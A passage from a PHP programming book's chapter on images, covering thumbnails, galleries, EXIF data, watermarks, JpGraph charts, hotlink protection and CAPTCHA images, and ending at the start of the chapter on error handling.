  • 229. Images 205 Next, we create a class constructor: Thumbnail.class.php (excerpt) public function __construct($maxWidth, $maxHeight, $scale = true, $inflate = true) { $this->maxWidth = $maxWidth; $this->maxHeight = $maxHeight; $this->scale = $scale; $this->inflate = $inflate; The constructor for the Thumbnail class takes four arguments. The first two are the maximum width and height of the thumbnail in pixels, respectively. The third ar­ gument tells the Thumbnail object whether it should scale the image to the thumbnail proportionally, or just stretch it, as with the earlier example. The fourth argument tells the Thumbnail object what to do with images that are too small; that is, whether to blow them up to fill the thumbnail. With those arguments safely stored in instance variables, we can create the rest of the constructor: Thumbnail.class.php (excerpt) $this->types = array('image/jpeg', 'image/png', 'image/gif'); $this->imgLoaders = array( 'image/jpeg' => 'imagecreatefromjpeg', 'image/png' => 'imagecreatefrompng', 'image/gif' => 'imagecreatefromgif' ); $this->imgCreators = array( 'image/jpeg' => 'imagejpeg', 'image/png' => 'imagepng', 'image/gif' => 'imagegif' ); } The $this->types property stores an array of the MIME types that this class can handle. The $this->imgLoaders property stores the names of the functions used to load images of those MIME types, while the $this->imgCreators property stores the names of the functions for creating new images of those types.
  • 230. 206 The PHP Anthology The Thumbnail class provides two methods for loading the image you want to con­ vert. The first, loadFile, allows you to specify a local file to load: Thumbnail.class.php (excerpt) public function loadFile ($image) { if (!$dims = @getimagesize($image)) { throw new ThumbnailFileException( 'Could not find image: '.$image); } if (in_array($dims['mime'],$this->types)) { $loader = $this->imgLoaders[$dims['mime']]; $this->source = $loader($image); $this->sourceWidth = $dims[0]; $this->sourceHeight = $dims[1]; $this->sourceMime = $dims['mime']; $this->initThumb(); return true; } else { throw new ThumbnailNotSupportedException( 'Image MIME type '.$dims['mime'].' not supported'); } } The loadFile method uses the getimagesize function to grab all the required image properties, including width, height, and MIME type. If getimagesize returns false, an error has occurred and we throw one of our custom exceptions, ThumbnailFileException. If the MIME type of the image is not on our list of sup­ ported types, we throw a ThumbnailNotSupportedException. If all’s well, we load the image via the image loading function that’s appropriate for the MIME type, and assign it to the $this->source property. We also assign the image width to the $this->sourceWidth property, the image height to the $this->sourceHeight property, and MIME type to the $this->sourceMime property. After all the instance variables are set, the method calls the initThumb method, which we’ll tackle in a moment. Finally, having no exceptions, the method returns true.
  • 231. Images 207 The loadData method performs the same function as loadFile, except that we load an image from a string rather than a file. The string might come from a database, for example. Here’s our loadData method: Thumbnail.class.php (excerpt) public function loadData ($image, $mime) { if ( in_array($mime,$this->types) ) { if($this->source = @imagecreatefromstring($image)) { $this->sourceWidth = imagesx($this->source); $this->sourceHeight = imagesy($this->source); $this->sourceMime = $mime; $this->initThumb(); return true; } else { throw new ThumbnailFileException( 'Could not load image from string'); } } else { throw new ThumbnailNotSupportedException( 'Image MIME type '.$mime.' not supported'); } } While the loadData method performs the same function and sets the same instance variables as the loadFile method, the functions it uses are not the same as loadFile’s. The loadData method first uses the imagecreatefromstring function to load the image, throwing a ThumbnailFileException if the image cannot be cre­ ated. The imagecreatefromstring will return an image resource obtained from the string data passed to the function in the argument. The width and height of our source images are obtained by the imagesx and imagesy functions, which, predict­ ably, return an image’s width and height. In addition to the image data, you also need to supply the MIME type as the second argument to the loadData method. Next, the buildThumb method is used to render the finished thumbnail:
  • 232. 208 The PHP Anthology Thumbnail.class.php (excerpt) public function buildThumb($file = null) { $creator = $this->imgCreators[$this->sourceMime]; if (isset($file)) { return $creator($this->thumb, $file); } else { return $creator($this->thumb); } } If you pass this method a filename, the thumbnail will be stored as a file that uses the name you’ve specified. Otherwise, the image is output directly to the browser, so you’ll need to make sure that you’ve sent the correct HTTP header first, which you’ll see in the usage example that follows the Thumbnail class description. Notice that we use the image function names we assigned to the $this->imgCreators property in the constructor. The final public methods are used to glean information about the thumbnail. The getMime method returns the MIME type, which can be used to generate a Content- Type header for the thumbnail: Thumbnail.class.php (excerpt) public function getMime() { return $this->sourceMime; } The getThumbWidth and getThumbHeight methods are used to return the width and height of the thumbnail in pixels; you could use that information to create an HTML img tag, for example: Thumbnail.class.php (excerpt) public function getThumbWidth() { return $this->thumbWidth; } public function getThumbHeight()
  • 233. Images 209 { return $this->thumbHeight; } Our class has a private method, called initThumb, that’s called by the loading methods I described previously. initThumb handles the scaling and inflating func­ tions of our class. The first step is to handle scaling: Thumbnail.class.php (excerpt) private function initThumb () { if ( $this->scale ) { if ( $this->sourceWidth > $this->sourceHeight ) { $this->thumbWidth = $this->maxWidth; $this->thumbHeight = floor( $this->sourceHeight * ($this->maxWidth/$this->sourceWidth) ); } else if ( $this->sourceWidth < $this->sourceHeight ) { $this->thumbHeight = $this->maxHeight; $this->thumbWidth = floor( $this->sourceWidth * ($this->maxHeight/$this->sourceHeight) ); } else { $this->thumbWidth = $this->maxWidth; $this->thumbHeight = $this->maxHeight; } } This part of the function will check to ascertain whether or not image scaling is re­ quired. If it is, some calculations will be performed to determine the appropriate size for the thumbnail so that it matches the width and height ratio of the original
  • 234. 210 The PHP Anthology image, constraining the longest axis to the maximum size originally supplied to the constructor. If scaling isn’t required, we simply use the $maxWidth and $maxHeight values ori­ ginally supplied to the constructor: Thumbnail.class.php (excerpt) else { $this->thumbWidth = $this->maxWidth; $this->thumbHeight = $this->maxHeight; } The next step is to create our blank thumbnail image by employing the imagecreatetruecolor function: Thumbnail.class.php (excerpt) $this->thumb = imagecreatetruecolor( $this->thumbWidth, $this->thumbHeight ); The final step in our initThumb method is to copy the source image into our thumbnail image: Thumbnail.class.php (excerpt) if ( $this->sourceWidth <= $this->maxWidth && $this->sourceHeight <= $this->maxHeight && $this->inflate == false ) { $this->thumb = $this->source; } else { imagecopyresampled( $this->thumb, $this->source, 0, 0, 0, 0, $this->thumbWidth, $this->thumbHeight, $this->sourceWidth, $this->sourceHeight );
  • 235. Images 211 } } } If the source image is smaller than the specified thumbnail image size and the inflate property is set to false, the thumb property is set to the original image. Otherwise, the imagecopyresampled function is used to resample the source image into the blank thumbnail image. We talked about the imagecopyresampled function in more detail in “How do I create thumbnail images?”. That’s it for our class! Let’s take it for a spin. Here’s a quick demonstration that outputs a thumbnail based on a file: thumbFromFile.php (excerpt) <?php require_once('Thumbnail.class.php'); $tn = new Thumbnail(200,200); $tn->loadFile('sample_images/terrier.jpg'); header('Content-Type: '.$tn->getMime()); $tn->buildThumb(); ?> First, we instantiate a Thumbnail object, specifying that we want our thumbnail to have dimensions of 200×200px. Then we call the loadFile method and pass it a filename. We use the PHP header function together with the getMime method to send the correct HTTP header; then, we simply call the buildThumb method to dis­ play the image. The result of our work is shown in Figure 8.2. Figure 8.2. A proportionally scaled thumbnail Here’s another example to show off the loadData method and illustrate how files can be stored rather than output directly:
  • 236. 212 The PHP Anthology beforeAndAfter.php (excerpt) <?php require_once('Thumbnail.class.php'); $tn = new Thumbnail(200, 200); $image = file_get_contents('sample_images/terrier.jpg'); $tn->loadData($image, 'image/jpeg'); $tn->buildThumb('sample_images/nice_doggie.jpg'); ?> We begin by including our class and instantiating our Thumbnail object. We simulate a source image string with the file_get_contents function. In a real-world situation, of course, this string would probably come from a database. We use the loadData method to load our image string and call the buildThumb method, but this time we also pass a filename argument to make the method save our thumbnail to a file at sample_images/nice_doggie.jpg. Next comes the HTML for our example page: beforeAndAfter.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Thumbnail Example </title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <style type="text/css"> div { float: left; } </style> </head> <body> <div> <h1>Before...</h1> <p> <img src="sample_images/terrier.jpg" alt="Original Image" /> </p> </div> <div> <h1>After...</h1> <p> <img src="sample_images/nice_doggie.jpg"
  • 237. Images 213 width="<?php echo ( $tn->getThumbWidth() );?>" height="<?php echo ( $tn->getThumbHeight() );?>" alt="Resized Image" /> </p> </div> </body> </html> Notice that as we generate the image tag for the thumbnail, we use the getThumbWidth and getThumbHeight methods to complete the <img> tag’s width and height attrib­ utes. The resulting page can be seen in Figure 8.3. Figure 8.3. The image before and after resizing There, now Rover looks cute at any size!
  • 238. 214 The PHP Anthology How can I put together a simple thumbnail gallery? In the previous section, we investigated how to how to create thumbnails without causing your much-loved pooch to look like some strange dog–bat hybrid. Armed with that knowledge, it should be an easy task to build a simple thumbnail gallery from a directory that contains PNG, GIF, and JPEG files! Solution We’ll use the Thumbnail class we created in the previous section, together with PHP’s built-in dir pseudo-class (refer to the section called “Using the dir Pseudo- Class” in Chapter 6 for more information on the dir pseudo-class) to create our gallery. We simply read through the directory, look for images that don’t have thumbnails, and create them; at the same time, we generate the HTML that will display them. An important benefit of this approach—creating and storing thumb­ nails on the disk—is that it saves us the overhead of having to create the thumbnails dynamically each time. The first step we need to take, of course, is to include our Thumbnail class and ini­ tialize our $image_html variable to an empty string: thumbGallery.php (excerpt) <?php require_once('Thumbnail.class.php'); $image_html = ''; The $image_html variable will eventually hold all the HTML for our gallery. Next, we use the dir pseudo-class to get a Directory object for our sample_images directory. This object allows us to start a while loop, which will loop over all the directory entries within sample_images: thumbGallery.php (excerpt) $dir = dir('sample_images'); while ($image = $dir->read()) {
  • 239. Images 215 Each loop will assign the next directory entry, obtained using the $dir->read method, to the $image variable. When there are no more directory entries, the loop will terminate. Next, we check that the directory entry we’ve obtained is an image file we want to include in our gallery: thumbGallery.php (excerpt) $ext = explode('.',$image); $size = count($ext); if (($ext[$size-1] == 'png' || $ext[$size-1] == 'jpg' || $ext[$size-1] == 'gif') && !preg_match('/^thumb_/', $image) && $image != '.' && $image != '..') { To check that the current directory entry is an image we want to include in our gallery, we first examine the file extension to ensure it’s a .png, .jpg, or .gif. We then make sure that the filename doesn’t begin with thumb_, which would indicate that it’s one of our thumbnails, and that the entry is not the . or .. directory entry. Provided these conditions are met, we proceed to create the thumbnail: thumbGallery.php (excerpt) if ( !file_exists('sample_images/thumb_'.$image) ) { $tn = new Thumbnail(200, 200, true, false); $tn->loadFile('sample_images/'.$image); $tn->buildThumb('sample_images/thumb_'.$image); } First, we check to make sure a thumbnail doesn’t already exist for the current image. Then, we create a new thumbnail with our Thumbnail class and save it, prepending thumb_ to the filename. The last step inside the while loop adds the HTML markup for the current image:
  • 240. 216 The PHP Anthology thumbGallery.php (excerpt) $image_html .= '<div class="image">' . '<a href="sample_images/'.$image.'">' . '<img src="sample_images/thumb_'.$image.'">' . '</a></div>'; } } ?> The HTML for the gallery page is quite simple; once the layout and the CSS style sheet have been created, the markup for the images is output from the $image_html variable: thumbGallery.php (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Thumbnail Example </title> <style type="text/css"> ⋮ insert attractive visual style here… </style> </head> <body> <h1>Gallery</h1> <?php echo ( $image_html ); ?> </body> </html> An example of this script’s output appears in Figure 8.4.
  • 241. Images 217 Figure 8.4. Our thumbnail gallery How do I extract EXIF information from images? Now that you have a functional gallery, you might like to provide visitors with extra information about the photo. The exchangeable image file format, better known as EXIF format, provides a mechanism for the storage of metadata within images; most digital cameras and image editing applications support this facility natively. If you’ve taken some of the images in your photo gallery with your digital camera, you can extract the EXIF data, such as date and time of the photo, the camera model, and the camera settings used, and display it alongside the shots. Solution Extracting this information is simplicity itself when you seek a little help from PHP’s EXIF functions. To use the EXIF functions you need to ensure your PHP in­
  • 242. 218 The PHP Anthology stallation has EXIF support enabled. Please read the instructions on the EXIF functions manual page.7 The exif_read_data function reads all the meta information from a JPEG or TIFF image into an array. Take a look at this example: exif.php (excerpt) <?php // Get the exif data $exif_data = exif_read_data( 'sample_images/terrier.jpg' ); echo '<pre>'; print_r($exif_data); echo '</pre>'; ?> The above code displays all the EXIF information available for an image. For the sake of brevity, as there’s a lot of meta information in the array, here’s a subset of the information available to us: Array ( [FileName] => terrier.jpg [FileDateTime] => 1185158396 [FileSize] => 46196 [FileType] => 2 [MimeType] => image/jpeg [Make] => FUJIFILM [Model] => FinePix S9500 [ExposureTime] => 10/520 [FNumber] => 390/100 [ISOSpeedRatings] => 80 [ShutterSpeedValue] => 576/100 ) Let’s take this information and update the output for the gallery we built in “How can I put together a simple thumbnail gallery?”. All we need to do is modify the code that generates the markup in the $image_html variable, like so: 7 http://www.php.net/exif/
  • 243. Images 219 exifGallery.php (excerpt) if($ext[$size-1] == 'jpg') { $exif_data = exif_read_data( 'sample_images/' . $image ); } else { $exif_data = array(); } $image_html .= '<div class="image">'; $image_html .= '<div class="thumbnail">'; $image_html .= '<a href="sample_images/' . $image . '">'; $image_html .= '<img src="sample_images/thumb_' . $image . '">'; $image_html .= '</a></div>'; $image_html .= '<div class="exifdata">'; if(isset($exif_data['FileDateTime'])) { $image_html .= '<p>Date: ' . date( 'jS F Y', $exif_data['FileDateTime'] ) . '</p>'; } if(isset( $exif_data['Make'])) { $image_html .= '<p>Taken with: ' . $exif_data['Make']; if(isset($exif_data['Model'])) { $image_html .= ' ' . $exif_data['Model']; } $image_html .= '</p>'; } $image_html .= '</div></div>'; In the above modification to our gallery, if the image is a JPEG image, we add to the display the date the picture was taken, and the make and model of the camera that was used, if those details are available. As you can see, the EXIF data appears beneath the appropriate images in Figure 8.5.
  • 244. 220 The PHP Anthology Figure 8.5. The thumbnail gallery displaying images’ EXIF data How do I add a watermark to an image? So, you really like your photos, and you want to protect them with a watermark. That is, you want to place some identifying image or text within the original image to show that you own the copyright to it. With the GD library and PHP, watermark­ ing’s a snap! Solutions The imagestring function can be used to place text within an image, while the imagecopymerge function can be used to place another image within your original image. Using either of these functions is extremely easy. Displaying a Text Watermark Adding text to an image is the simplest form of watermarking. Here’s how it works:
  • 245. Images 221 textWatermark.php (excerpt) <?php $image = imagecreatefromjpeg('sample_images/thumb_terrier.jpg'); $color = imagecolorallocate($image, 68, 68, 68); imagestring($image, 5, 90, 0, "Abbey '07", $color); header('Content-Type: image/jpg'); imagejpeg($image); ?> The imagecolorallocate function allows you to create a new color to use for drawing on the image by specifying the red, green, and blue components. The function returns a number, which identifies that color in the image. Once you have the color in hand, you can use the imagestring function to place the text over the image. The first of the function’s arguments is the image, and the second is a font number—the numbers 1–5 refer to built-in fonts. You can use imageloadfont to make other fonts available. The third and fourth arguments rep­ resent the horizontal and vertical coordinates at which the text should be drawn on the image. The fifth argument contains the text you wish to be placed in the image, and the last argument specifies the color of the text. The output of this script is shown in Figure 8.6. Figure 8.6. Applying a text watermark Displaying a Graphical Watermark A logo or some other identifiable graphic with a transparent background is easily placed over another image. Here’s an example:
  • 246. 222 The PHP Anthology imageWatermark.php (excerpt) <?php $image = imagecreatefromjpeg('sample_images/thumb_terrier.jpg'); $iWidth = imagesx($image); $watermark = imagecreatefrompng( 'sample_images/sitepoint_watermark.png'); $wmWidth = imagesx($watermark); $wmHeight = imagesy($watermark); $xPos = $iWidth - $wmWidth; imagecopymerge($image, $watermark, $xPos, 0, 0, 0, $wmWidth, $wmHeight, 100); header('Content-Type: image/jpg'); imagepng($image); ?> The process is a simple matter. Load the original image and the watermark image; then, once the original image’s height and width have been obtained, use imagecopymerge to place the watermark on the original image. The first two argu­ ments to the imagecopymerge function are the original or destination image object, and the source image object—the watermark, in our case. The next four arguments represent the x and y coordinates of the destination image and source image respect­ ively, starting from the top-left corner of the images. The following two arguments represent the width and height of the source image. The last argument represents the level of transparency desired for true color images—an argument of 100 specifies no transparency, while an argument of 0 causes the original image to remain un­ marked by the watermark. The result, in this case, is shown in Figure 8.7—a miniature SitePoint logo appears in the upper-right corner of the photo.
  • 247. Images 223 Figure 8.7. Applying a graphical watermark How do I display charts and graphs with PHP? The display of data in graphical form is a powerful way to communicate with your site’s visitors, and can help you to understand exactly how your site’s being used. The graphs could show any relevant data, including your site’s monthly traffic statistics, or counts of sales made on your site. Solutions A number of projects extend PHP’s basic capabilities to render images, allowing data to be displayed as some form of graph or chart. First and foremost is a project written in PHP that makes full use of the GD library and PHP’s image functions: the excellent JpGraph library.8 You can do a lot with JpGraph, and to provide a detailed examination is beyond the scope of this book. At over 1MB in size, the documentation is extremely thorough, and offers many useful examples. If you’re looking for more advanced reading on JpGraph, I recom­ mend two articles by Jason E. Sweat: one at Zend Developer Zone,9 the other at php | architect.10 Here, however, we’ll get a feel for the library as we use it to display bar and pie charts for a given set of data. Be aware that JpGraph is licensed free for noncommercial use only—make sure you read the licensing information on the site. The version I’ll use in this example is 2.2, which only works on PHP versions 5.1.0 and above. If you’re using PHP 4, you’ll need to download version 1 of JpGraph. The code here also assumes that 8 http://www.aditus.nu/jpgraph/ 9 http://devzone.zend.com/node/view/id/1260/ 10 http://www.phparch.com/issuedata/2003/apr/sample.php
  • 248. 224 The PHP Anthology you’ve added the jpgraph/src/ directory to your PHP include path, to allow the Jp- Graph class files to be loaded. JpGraph and PHP Error Notices You may run into trouble using JpGraph if you have PHP’s error notices switched on in php.ini. The generated error messages can cause the graph image to fail to display. The examples in this chapter explicitly disable notices in order to avoid this problem. See Chapter 9 for more information on how to control error reporting. Creating a Bar Graph First, let’s see how we can generate a bar graph with JpGraph: bargraph.php (excerpt) <?php error_reporting(E_ALL ^ E_NOTICE); require_once ('jpgraph.php'); require_once ('jpgraph_bar.php'); $xdata = array('Mousemats','Pens','T-Shirts','Mugs'); $ydata = array (35,43,15,10); First, we turn off E_NOTICE reporting; then we include the core “engine” as well as the bar graph class (make sure you have it in your PHP include path). Next, we set up two arrays of sample data that will be plotted on the x and y axes of the graph. In a practical application, these might be results you’ve fetched from MySQL. The JpGraph API is fairly self-explanatory, and comes with excellent quality docu­ mentation. The first step in generating a graph from our data arrays is to set up the foundations of the graph itself, setting its size and background color: bargraph.php (excerpt) // Width, height,cache filename $graph = new Graph(400,200,'auto'); // Margin widths $graph->img->SetMargin(40,20,20,40); // X text scale, Y linear scale
  • 249. Images 225 $graph->SetScale('textlin'); // Plot background $graph->SetColor('white'); // Margin color $graph->SetMarginColor('darkgray'); // Use a drop shadow $graph->SetShadow(); // Frame color $graph->SetFrame(true,'black'); It’s no problem to add a title to the graph. JpGraph comes with three built-in bitmap fonts, two of which can be displayed in bold, as well as built-in support for a number of TrueType fonts.11 Note that the TrueType fonts aren’t packaged with JpGraph—they must be available separately, as part of your operating system fonts. Next, we set the graph’s title: bargraph.php (excerpt) // Title text $graph->title->Set('Sales Figures for March'); // Title color $graph->title->SetColor('white'); // Title font $graph->title->SetFont(FF_VERDANA,FS_BOLD,14); Now, let’s construct the x axis. Here, the labels are assigned using the SetTickLabels method, ticks being the markers for each interval on the x axis: bargraph.php (excerpt) // Axis title text $graph->xaxis->title->Set('Product Type'); // Axis title color $graph->xaxis->title->SetColor('black'); // Axis title font $graph->xaxis->title->SetFont(FF_VERDANA,FS_BOLD,10); // Add labels $graph->xaxis->SetTickLabels($xdata); 11 These include Courier, Verdana, Times, Comic, Arial, Georgia, Trebuchet, Gnome Vera, Chinese, Ja­ panese, and Hebrew fonts.
  • 250. 226 The PHP Anthology // Axis colors $graph->xaxis->SetColor('black','white'); // Axis font $graph->xaxis->SetFont(FF_VERDANA,FS_NORMAL,8); // Hide ticks $graph->xaxis->HideTicks(); The y axis will take numeric values that are generated automatically once the y data is added: bargraph.php (excerpt) // Axis title text $graph->yaxis->title->Set('Units Sold'); // Axis title color $graph->yaxis->title->SetColor('black'); // Axis title font $graph->yaxis->title->SetFont(FF_VERDANA,FS_BOLD,10); // Axis colors $graph->yaxis->SetColor('black','white'); // Axis font $graph->yaxis->SetFont(FF_VERDANA,FS_NORMAL,8); // Hide ticks $graph->yaxis->HideTicks(); In the following code, we create a new BarPlot object that handles the drawing of the bars on the chart: bargraph.php (excerpt) // Instantiate with Y data $bplot = new BarPlot($ydata); // Width of bars $bplot->SetWidth(0.75); // Set bar background color $bplot->SetFillColor('darkgray'); All that remains is to add the bar chart plot object to the graph object, and send it to the browser:
  • 251. Images 227 bargraph.php (excerpt) $graph->Add($bplot); $graph->Stroke(); ?> Figure 8.8 shows the outcome—it’s not bad for just 33 lines of PHP, is it? Figure 8.8. Graph revealing a massive demand for pens in March Creating a Pie Chart Another type of graph that can be built very easily with JpGraph is the pie chart. Let’s use the sample data we used in the last example to build a pie chart. At the start of the script, we must include the main pie chart class and the class for a three-dimensional pie chart: piechart.php (excerpt) <?php error_reporting(E_ALL ^ E_NOTICE); require_once ('jpgraph.php'); require_once ('jpgraph_pie.php'); require_once ('jpgraph_pie3d.php'); $xdata = array('Mousemats','Pens','T-Shirts','Mugs'); // X Axis $ydata = array (35,43,15,10); This time, rather than using the Graph class, we use the PieGraph class:
  • 252. 228 The PHP Anthology piechart.php (excerpt) // Width, height, cache filename $graph = new PieGraph(400,200,'auto'); // Margin color $graph->SetMarginColor('white'); // Use a drop shadow $graph->SetShadow(); // Frame color $graph->SetFrame(true,'black'); We set this chart’s title as we did for the previous graph: piechart.php (excerpt) // Title text $graph->title->Set('March Sales'); // Title color $graph->title->SetColor('black'); // Title font $graph->title->SetFont(FF_VERDANA,FS_BOLD,14); We also need a legend to identify what each segment of the pie chart represents: piechart.php (excerpt) // Legend text color $graph->legend->SetColor('black'); // Legend background color $graph->legend->SetFillColor('gray'); // Legend position $graph->legend->Pos(0.02,0.61); Now, we create the three-dimensional pie chart object; we instantiate it with the y data while using the x data for the legends, and pop out two of the pie slices for effect:
  • 253. Images 229 piechart.php (excerpt) // Instantiate 3D pie with Y data $pie = new PiePlot3d($ydata); // Add X data to legends $pie->SetLegends($xdata); // Set color theme (earth|pastel|sand|water) $pie->SetTheme('earth'); // Center relative to X axis $pie->SetCenter(0.36); // Size of pie radius in pixels $pie->SetSize(100); // Set tilt angle of pie $pie->SetAngle(30); // Pop out a slice $pie->ExplodeSlice(2); // Pop out another slice $pie->ExplodeSlice(3); We’ll display a label next to each segment on the chart to identify the percentage of the whole that segment represents: piechart.php (excerpt) // The font $pie->value->SetFont(FF_VERDANA,FS_NORMAL,10); // Font color $pie->value->SetColor('black'); Finally, we add our pie chart object to the graph object and send it to the browser: piechart.php (excerpt) $graph->Add($pie); $graph->Stroke(); ?> The result of our work is shown in Figure 8.9.
  • 254. 230 The PHP Anthology Figure 8.9. The not-so-humble pie chart Discussion JpGraph represents the premiere graphing solution for PHP, and it offers much more functionality than we’ve had a chance to explore with these examples. Of particular note is the fact that this solution allows you to store the rendered graphs as PNG files, so that you can render each graph once and reuse the finished image. If you wanted to save the graph created by the code above, you’d simply change the call to Stroke by supplying a filename, making sure that the web server has permissions to write to this location. Here’s an example: $graph->Stroke('humble_pie.png'); This process will create a file called humble_pie.png, and won’t return anything to the browser. How do I prevent the hotlinking of images? One problem you may encounter, particularly if your site hosts unique images, is other sites that hotlink to your images from their pages, in order to make it seem as though they own or host your cool images. Aside from the potential copyright issues here, hotlinking of your images by outside sites may also eat up your bandwidth. Hotlinking is to be avoided like the plague, as I’m sure you’ll agree! Solutions Here we have two solutions; one uses the mod_rewrite extension to Apache and the other uses PHP sessions.
  • 255. Images 231 Using Apache’s mod_rewrite The default behavior of a web browser is to send a referer value with each HTTP request. This value represents the URL from which the current request originated. For HTTP requests for images, this URL should reflect the page on which the images appear. We can use Apache’s mod_rewrite to check the referral information that the visiting browser provides to ensure that the referring source for all requests for our site’s images is a local web page. For example, we can place these settings in our web server’s http.conf file: SetEnvIfNoCase Referer "^http://www.sitepoint.com/" ➥ locally_linked=1 SetEnvIfNoCase Referer "^http://sitepoint.com/" locally_linked=1 SetEnvIfNoCase Referer "^$" locally_linked=1 <FilesMatch ".(gif|png|jpe?g)$"> Order Allow,Deny Allow from env=locally_linked </FilesMatch> Here, we indicate that any request for a file with a name that ends in .gif, .png, .jpeg, or .jpg, and which contains http://www.sitepoint.com/, http://sitepoint.com/, or a blank string in the referer field, should be considered valid. This specification should therefore block any requests for images for which none of those values are reflected in the referer field. We need to allow requests with a blank referer field, as they could be legitimate requests—it’s likely that some requests won’t have referer information. For example, it’s entirely reasonable for a visitor to your web site to have disabled the reporting of referer information for privacy reasons. In short, the field cannot be relied upon to determine that hotlinking is taking place; rather than risk blocking images for what may be a legitimate request, we need to allow such requests. Using PHP Sessions Another option is to use PHP sessions to establish that the person viewing the image is a visitor to your site. The trick is to register a session variable that a visitor must have in order to be able to view the image, then use a second script to render the image. For example, here’s a simple web page that displays an image, where the image source URL is a PHP script that ensures that only valid site visitors can see the image:
  • 256. 232 The PHP Anthology hotlinking.php (excerpt) <?php session_start(); $_SESSION['viewImages'] = true; ?> <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Preventing Hotlinking</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> </head> <body> <p>Here is the image:</p> <img src="getimage.php?img=husky.jpg"> </body> </html> Notice that this code registers a session variable called viewImages, and a value of getimage.php?img=husky.jpg appears in the src attribute of the <img> tag. Here’s the code for that getimage.php script. Firstly, we check the viewImage session variable to see that it has been set to true: getimage.php (excerpt) <?php session_start(); if (isset($_SESSION['viewImages']) && $_SESSION['viewImages'] == true) { If the viewImage session variable has been set to true, the image name provided via the $_GET['img'] variable is checked to ensure that it’s registered in the array of allowed images, $images:12 12 A more practical alternative is to store the list of images in a database. However you manage the list, it’s important to verify that the file requested is one you intended to grant access to; otherwise, you may be allowing access to more than you expect.
  • 257. Images 233 getimage.php (excerpt) $images = array( 'golden_retriever.jpg', 'husky.jpg' ); if (isset($_GET['img']) && in_array($_GET['img'],$images)) { The request is valid, so we output the response headers and the image: getimage.php (excerpt) $dims = getimagesize('sample_images/'.$_GET['img']); header('Content-Disposition: inline; filename=' . $_GET['img']); header('Content-Type: '.$dims['mime']); # PHP 4.3.x + header('Content-Length: ' . filesize('sample_images/' . $_GET['img'])); readfile('sample_images/'.$_GET['img']); } Notice that the script also uses the getimagesize function you saw earlier in “How do I resize images without stretching them?” to obtain the correct MIME type for the image. Finally, we handle the error conditions by returning an HTTP status of 404 Not Found: getimage.php (excerpt) else { header("HTTP/1.1 404 Not Found"); header("Content-Type: text/plain" ); echo "Invalid image or no image specifiedn"; } } else { header("HTTP/1.1 404 Not Found"); header("Content-Type: text/plain" );
  • 258. 234 The PHP Anthology echo "This image is protected from hotlinkingn"; } ?> This protection should stop all but the most determined hotlinkers. How do I create images that can be verified by humans only? With the ever-growing number of automated spamming robots which tirelessly scour the Web, human-verification techniques are becoming an increasingly neces­ sary part of the creation of web forms. The most common technique is the Completely Automated Public Turing Test to Tell Computers and Humans Apart—conveniently abbreviated to CAPTCHA—which presents the visitor with a word, or sequence of characters, in such a way that it’s hard for machines to decipher, but easy for a hu­ man being to read and type in.13 Solution Conveniently, the JpGraph library we discussed in “How do I display charts and graphs with PHP?” comes with an extremely easy-to-use CAPTCHA implementation: captcha.php (excerpt) <?php require_once "jpgraph_antispam.php"; $spam = new AntiSpam(); $chars = $spam->Rand(6); $spam->Stroke(); ?> A sample result of this script is shown in Figure 8.10. Figure 8.10. A CAPTCHA image created using JpGraph 13 You can read more about CAPTCHA at the official web site: http://www.captcha.net/.
  • 259. Images 235 If you want to specify a particular word to appear in the box, simply change the call to Rand with: $spam->Set("my_string"); Discussion Of course, this is only half the story. You’ll need to store the CAPTCHA text some­ where—such as within a session variable—in order to validate the user-entered version of the text on the next page. Don’t pass the text through as a form field, though—even a hidden one—as it could be altered by a malicious user. Summary In this chapter, we’ve examined the topics of MIME types, resizing images, creating galleries, extracting EXIF information, watermarking, producing graphical charts, preventing the hotlinking of your images, and creating CAPTCHA images. Add the tips from other chapters in this book into the mix, and you’re well equipped to create a host of image manipulation scripts, from the downright useful to the truly unique. However, one issue you should consider is the performance implications of on-the­ fly image manipulation, which chews through a significant amount of processing time. Consider a gallery of 100 folders, each holding 100 images; this isn’t a partic­ ularly excessive number, even for the casual holiday-maker. The creation of 10,000 thumbnails for every visitor is not a small task. Similarly, creating your company web site’s banner image for every page load is not only time-consuming, but also largely unnecessary. While the simple thumbnail caching techniques we covered here might suit many cases, they won’t be appropriate for those instances where the image might change over time—the creation of charts based on ever-changing datasets is a case in point. I highly recommend you refer to Chapter 11, for more advanced performance im­ provement techniques. The practice of manipulating images in PHP is widespread. Examples include social networking sites that create thumbnails of your profile image, web page forms that make use of CAPTCHA images, and photo gallery sites that allow you to edit, crop,
  • 260. 236 The PHP Anthology and rotate your images in the web browser (most likely through the liberal sprinkling of JavaScript and Ajax). What you can achieve is, more or less, only limited by your imagination!
  • 261. 9 Chapter Error Handling In PHP, errors are used to indicate syntax, environmental, or programming problems: syntax errors These are unrecoverable compile-time errors that indic­ ate a syntax problem and cause the PHP interpreter to halt. environmental errors Environmental errors are problems associated with the script’s runtime environment and associated services. Such errors may indicate a database server being un­ available, a file that’s unable to be opened, restrictions resulting from permission levels, and so on. programming errors Programming errors are unexpected events that occur during normal program execution. This type of error may indicate, for example, passing unexpected argu­ ments to a function call (such as an array when the function expects a string), referencing undefined vari­ ables or array indices, and so on.
